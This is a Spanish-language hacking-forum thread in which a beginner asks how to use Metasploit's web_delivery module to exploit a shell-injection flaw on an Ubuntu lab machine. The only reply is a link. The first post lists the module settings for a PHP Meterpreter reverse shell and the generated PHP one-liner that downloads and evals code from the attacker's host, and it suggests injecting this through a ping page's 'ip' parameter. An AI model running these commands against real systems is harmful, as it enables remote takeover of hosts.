elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Escalada de privilegios con WEB_DELIVERY
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Escalada de privilegios con WEB_DELIVERY  (Leído 2,486 veces)
Gsusseppe84

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Escalada de privilegios con WEB_DELIVERY
« en: 10 Septiembre 2018, 14:20 pm »

Buenos días,
Tengo que hacer una escalada de privilegios de una máquina virtual basada en Ubuntu.
Detecto a través de la herramienta VEGA, que existe 1 vulnerabilidad crítica “Shell Injection” y para explotar la misma, me obligan a realizarlo a través del módulo web_delivery de metaesploit, por tanto, procedo a los siguientes pasos:

Use exploit/multi/script/web_delivery
Msf exploit (web_delivery)>set lhost 192.168.1.132

 (entiendo que aquí es donde pongo la ip de la máquina donde tengo alojado Kali Linux, sin embargo, en ningún momento estoy metiendo la IP de la máquina donde tengo que hacer la escalada de privilegios, que sería Rhost si no me equivoco)
Msf exploit (web_delivery)>set lport 4444
Msf exploit (web_delivery)>set target 1
Msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

(entiendo que elijo PHP ya que es Ubuntu donde se encuentra la máquina a atacar)
Msf exploit (web_delivery)>run

Obtengo el siguiente código malicioso php, sin embargo, no sé dónde ejecutarlo en la máquina de la víctima.
Php –d allow_url_fopen=true –r “eval(file_get_contents(´http://192.168.1.132:8080/qH0s5l2UGvbKap’));”
¿lo pongo seguido a la url? http://192.168.1.132/ping/index.php?ip=
Estoy empezando en esto y soy muy torpe.
Gracias de antemano.

« Última modificación: 10 Septiembre 2018, 14:25 pm por Gsusseppe84 » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Escalada de privilegios con WEB_DELIVERY
« Respuesta #1 en: 10 Septiembre 2018, 18:11 pm »

:http://www.elladodelmal.com/2017/02/metasploit-web-delivery-un-modulo-que.html
En línea

Te vendería mi talento por poder dormir tranquilo.
Gsusseppe84

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Escalada de privilegios con WEB_DELIVERY
« Respuesta #2 en: 12 Septiembre 2018, 09:34 am »

gracias por el enlace. Este ya lo había leído, sin embargo no me aclara mucho la verdad. que rabia
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
0-DAY windows escalada privilegios!
Bugs y Exploits
Debci 8 9,127 Último mensaje 18 Agosto 2010, 19:29 pm
por guicamper322
ayuda escalada de privilegios!!!
Bugs y Exploits
morty2 4 7,862 Último mensaje 12 Octubre 2011, 21:40 pm
por morty2
Escalada de privilegios
Hacking
XKC 1 2,828 Último mensaje 27 Febrero 2018, 23:15 pm
por engel lex
[AYUDA][Bach] Escalada de privilegios
Scripting
CodeRed 8 6,096 Último mensaje 30 Abril 2020, 20:07 pm
por CodeRed
Encontrar un exploit de escalada de privilegios de root en Android
Dudas Generales
TickTack 0 2,211 Último mensaje 8 Mayo 2020, 18:08 pm
por TickTack
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines